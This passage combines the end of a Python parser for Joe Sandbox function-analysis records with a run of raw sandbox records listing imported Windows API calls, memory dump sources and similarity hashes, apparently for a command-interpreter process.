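• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001A52A4
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1036
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1048
• SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1064
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1073
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
BULLET = "•"
# "Func.Module(args), ref: 001B650F" or, for CRT imports, "towupper.MSVCRT ref: 001B7277"
API_LINE = re.compile(r"^(?P<func>\w+)\.(?P<module>[\w.-]+?)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "Key: value", dropping the "Download File" link text the web page fuses onto dump names
KV_LINE = re.compile(r"^(?P<key>[^:]+?):\s*(?P<val>.*?)(?:Download File)?$")


def parse_records(text: str) -> List[Dict]:
    """One dict per function: a record starts at every 'APIs' header."""
    records: List[Dict] = []
    rec: Optional[Dict] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "dumps": [], "meta": {}}
                records.append(rec)
            section = line
        elif line.startswith(BULLET) and rec is not None:
            body = line[len(BULLET):].strip()
            if section == "APIs":
                m = API_LINE.match(body)
                if m is None:
                    raise ValueError(f"unrecognised API line: {body}")
                rec["apis"].append({"func": m["func"], "module": m["module"],
                                    "args": m["args"].split(",") if m["args"] else [],
                                    "ref": int(m["ref"], 16)})
            elif section == "Strings":
                rec["strings"].append(body)
            else:  # Memory Dump Source, IDA Plugin and Similarity are key: value lines
                m = KV_LINE.match(body)
                if m is None:
                    raise ValueError(f"unrecognised key/value line: {body}")
                if section == "Memory Dump Source":
                    rec["dumps"].append({"kind": m["key"], "value": m["val"]})
                else:
                    rec["meta"][m["key"]] = m["val"]
    return records


def api_sequence(rec: Dict) -> List[str]:
    """Imported function names in call-site order."""
    return [a["func"] for a in rec["apis"]]


def contains_subsequence(seq: Sequence[str], pattern: Sequence[str]) -> bool:
    """True if every element of `pattern` occurs in `seq`, in that order."""
    it = iter(seq)
    return all(any(item == want for item in it) for want in pattern)


def find_by_sequence(records: List[Dict], pattern: Sequence[str]) -> List[int]:
    """Entry refs of functions whose API order contains `pattern`, e.g. the
    delete / fail / clear-attributes / delete-again idiom."""
    return [r["apis"][0]["ref"] for r in records
            if r["apis"] and contains_subsequence(api_sequence(r), pattern)]


def index_by_fuzzy_hash(records: List[Dict]) -> Dict[str, List[int]]:
    """Group entry refs by Instruction Fuzzy Hash to spot the same function
    recurring across dumps; records without the field are skipped."""
    index: Dict[str, List[int]] = {}
    for r in records:
        h = r["meta"].get("Instruction Fuzzy Hash")
        if h and r["apis"]:
            index.setdefault(h, []).append(r["apis"][0]["ref"])
    return index
```

The subsequence search is what you would use to locate the order visible in the 001A5294 record, RemoveDirectoryW, then GetLastError, GetFileAttributesW, SetFileAttributesW with 00000000, then RemoveDirectoryW again, which reads as a retry after clearing the attributes of a directory that could not be removed; `find_by_sequence(parse_records(SAMPLE), ["RemoveDirectoryW", "SetFileAttributesW", "RemoveDirectoryW"])` returns `[0x1A5294]`. The hash index keys on Instruction Fuzzy Hash only: on this page the Opcode ID and Opcode Fuzzy Hash fields are identical for every record, so they add nothing for matching.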
APIs
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001A5294
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001A52A4
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1036
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1048
• SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1064
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1073
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
• API String ID: 3961617410-1166558509
                                                                                                                                                                                                                          • Opcode ID: 83e14385beeac1fc6a44a02181153361f260802200958e6c0992155e6dbde1d3
                                                                                                                                                                                                                          • Instruction ID: 51b8972f661e5154cac31daec0f38f423b801ae4c789989abb00ea37d73fe0a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83e14385beeac1fc6a44a02181153361f260802200958e6c0992155e6dbde1d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7711EC39A06614EB8720AB349C487BF77B9EF47750746411BF812D2190DB748DC5D1A1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A1665
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A1689
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A16AD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A16D1
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A17CF
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A17E9
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A1801
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A1813
                                                                                                                                                                                                                            • Part of subcall function 001A260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001A2650
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1034426908-0
                                                                                                                                                                                                                          • Opcode ID: 665d6f433dfc36feb3c0c7e1bc9082284163271c48f18edb5728bef217a8b053
                                                                                                                                                                                                                          • Instruction ID: 20bb3ac8d2d9677cc6dd03287730c1ca0936ed741e4ae68d7a18423785911ff6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 665d6f433dfc36feb3c0c7e1bc9082284163271c48f18edb5728bef217a8b053
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F18C75A04219ABDF28DF64CC85AAABBF5FF15304F1441A9E849D7241EB34EE81CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,001B9E02,?,?,001B9E02), ref: 001B4618
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B4637
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CA7F0,001B9E02,?,00000000,?,001B9E02), ref: 001B4646
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B4653
                                                                                                                                                                                                                          • memcmp.MSVCRT(001CA7F0,001934F8,00000003), ref: 001B4693
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,001B9E02,00000000,?,001B9E02,?,001B9E02), ref: 001B4720
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,001B9E02,00000000,00000000,?,001B9E02), ref: 001B4742
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B474F
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F1,00000001,?,00000000,?,001B9E02), ref: 001B4764
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B4771
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2002953238-0
                                                                                                                                                                                                                          • Opcode ID: d5ba16d42a0c8092541e04c9789b2a925da589ef7746094ace1cf535ff0e49e8
                                                                                                                                                                                                                          • Instruction ID: f30fc4a41e2a8be3dd22824abc6c19ddea696cbce2076a3298499ba68ac0d6c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ba16d42a0c8092541e04c9789b2a925da589ef7746094ace1cf535ff0e49e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351F371A41204AFDF218F68CC49BBEBBB9EF52710F18815AF851DB291DB718D80CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,001CA7F0,00000000,?,00000200), ref: 0019C818
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019C882
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019C8BA
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019C8C4
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019C8DB
                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019C8ED
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0019C90D
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 0019C91E
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CA7F0,00000200,00000000,00000000), ref: 0019C934
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 0019C941
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019CAC4
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019CACE
                                                                                                                                                                                                                          • memcmp.MSVCRT(001CA7F0,001934F8,00000003), ref: 001AD16E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1383533039-0
                                                                                                                                                                                                                          • Opcode ID: 7463fa9ad08076112e39e25782a1b9bfce4aae18e2e2ad17865a6536558b05c2
                                                                                                                                                                                                                          • Instruction ID: 19910ab8c7e76040845ede4f99f4248dc214a02085e32bef0352dc391791aacb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7463fa9ad08076112e39e25782a1b9bfce4aae18e2e2ad17865a6536558b05c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C4106719023188BEF34CF28DC89BA97776AF45710F9800AAF40A97590DBB58DD1CF96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _wcsicmp
• String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
• API String ID: 2081463915-1668778490
• Opcode ID: abe228e937dbea54d8421ee0d6f08ddddbcc73268e2ca557310f1dad99ee0c33
• Instruction ID: 6da90ea97ccf639777101cf80d4e4144c4efa972e119f2911cf409cbb3fd2046
• Opcode Fuzzy Hash: abe228e937dbea54d8421ee0d6f08ddddbcc73268e2ca557310f1dad99ee0c33
• Instruction Fuzzy Hash: 9E21B775609306AAEB2D5B65AC1673A27D8EF8A764F64441FF042825C1EFF4C8408A66
APIs
• memset.MSVCRT ref: 00199F3A
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• _get_osfhandle.MSVCRT ref: 0019A02D
• _get_osfhandle.MSVCRT ref: 0019A03F
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 0019A0E8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _get_osfhandlememset
• String ID: DPATH
• API String ID: 3784859044-2010427443
• Opcode ID: 9b3d3780b9de1772143c902e9feb037098d2227d5a3d751c1873277da1c8d4af
• Instruction ID: df41eaf90510791cf46119aceea9dd42e5ea0ac25b3ee7cf56a19c8716d1c0bc
• Opcode Fuzzy Hash: 9b3d3780b9de1772143c902e9feb037098d2227d5a3d751c1873277da1c8d4af
• Instruction Fuzzy Hash: 69A1F135A00201ABCF24AF78CC8597AB7F5EF99720B28862DF45697290DB30DC45CBD1
APIs
• _get_osfhandle.MSVCRT ref: 001B4A7B
• GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 001B4B98
• SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 001B4BC5
• SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 001B4BD2
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B4BDC
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B4C30
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: LocalTime$ErrorLast$_get_osfhandle
• String ID: %s$/-.
• API String ID: 1033501010-531045382
• Opcode ID: 8cc86b159add651ec3a348cd25e6ae046d7e1b680565b677a1508fc63c990cb4
• Instruction ID: f48bd52e8d3a499d8eec5da0656ca531218398b7684d30f6ddfa138c7813cde6
• Opcode Fuzzy Hash: 8cc86b159add651ec3a348cd25e6ae046d7e1b680565b677a1508fc63c990cb4
• Instruction Fuzzy Hash: 56815432A4021597DF28EB78CD46BFA73A4EF94B00F20816AE906D7192EF71DE45C614
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _wcsnicmpswscanf
• String ID: :EOF
• API String ID: 1534968528-551370653
• Opcode ID: 2cfce2a9877d28769ef2f1b18eaf361c6eea78d514d3fbdc7e8320f1491e8e83
• Instruction ID: 3758c9198e5b97aaeebe0c067763091d8aaa538ee3f5c63d525cb1974e5c3ad5
• Opcode Fuzzy Hash: 2cfce2a9877d28769ef2f1b18eaf361c6eea78d514d3fbdc7e8320f1491e8e83
• Instruction Fuzzy Hash: C5315735A16360ABCF20AF649C49F7A77A8FF52710F54042AF982976D1DB34DC81C7A1
APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 001B6069
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 001B607E
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 001B60DC
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 001B6128
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 001B614F
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 001B6186
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: dbf62a6f1f0d3fcabc1b41df82ced4a6bd8e81aa135a42b003493f971a448795
• Instruction ID: 16f0d47b65a9e55954e86decf81f931aabc39c8588a3a3112aec45f8043a2e79
• Opcode Fuzzy Hash: dbf62a6f1f0d3fcabc1b41df82ced4a6bd8e81aa135a42b003493f971a448795
• Instruction Fuzzy Hash: 2E4171B1A01219ABDB20DB25DC85ABB777CEF41744F0040A9FA05E3281DB349E85CB65
APIs
• _wcsicmp.MSVCRT ref: 001A65A4
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 001A65D7
• _open_osfhandle.MSVCRT ref: 001A65EB
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 001B2092
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: 1da9f17fda611bde7e9194d3d26bac6e243d42adcfff99b8cabef3d79e36128e
• Instruction ID: 4d38af1aabe8551378292536ffc1c91157196f70030d0162bd54d6e58e05d328
• Opcode Fuzzy Hash: 1da9f17fda611bde7e9194d3d26bac6e243d42adcfff99b8cabef3d79e36128e
• Instruction Fuzzy Hash: EE314C76E01204AFD7289BA89C49BAF7BB9EB42774F35422AF412E31C0DB749D41C751
APIs
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 001B61D7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 001B6211
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 001B6254
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001B625B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 001B628D
• RtlFreeHeap.NTDLL(00000000), ref: 001B6294
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 001B629B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                                                                                                                                                                          • String ID: PE
                                                                                                                                                                                                                          • API String ID: 3093239467-4258593460
                                                                                                                                                                                                                          • Opcode ID: b0c262c8b3e3b5803c0b612852b64431cb8f37d112b5492cb32278f9c2f958cb
                                                                                                                                                                                                                          • Instruction ID: eae50379ff5616549c1080cc9c5281fb0a057e48f91675a2db69b5621f177cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0c262c8b3e3b5803c0b612852b64431cb8f37d112b5492cb32278f9c2f958cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93310E34701304AAFB20ABA28C09FEE7769AFE8B51F044265F911D61D0DB788846C661
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00198FCD
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00198FE3
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00199002
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00199013
                                                                                                                                                                                                                            • Part of subcall function 0019A62F: wcschr.MSVCRT ref: 0019A635
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2943530692-0
                                                                                                                                                                                                                          • Opcode ID: 553f6e348a107214a1a14a3b4ce1d13d784c30d2ae38a67579d0e44e5b3db711
                                                                                                                                                                                                                          • Instruction ID: 0dfa7a03400c8d01ff9f05df45172e0f530321e0d723be611ef76c25bbf56929
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 553f6e348a107214a1a14a3b4ce1d13d784c30d2ae38a67579d0e44e5b3db711
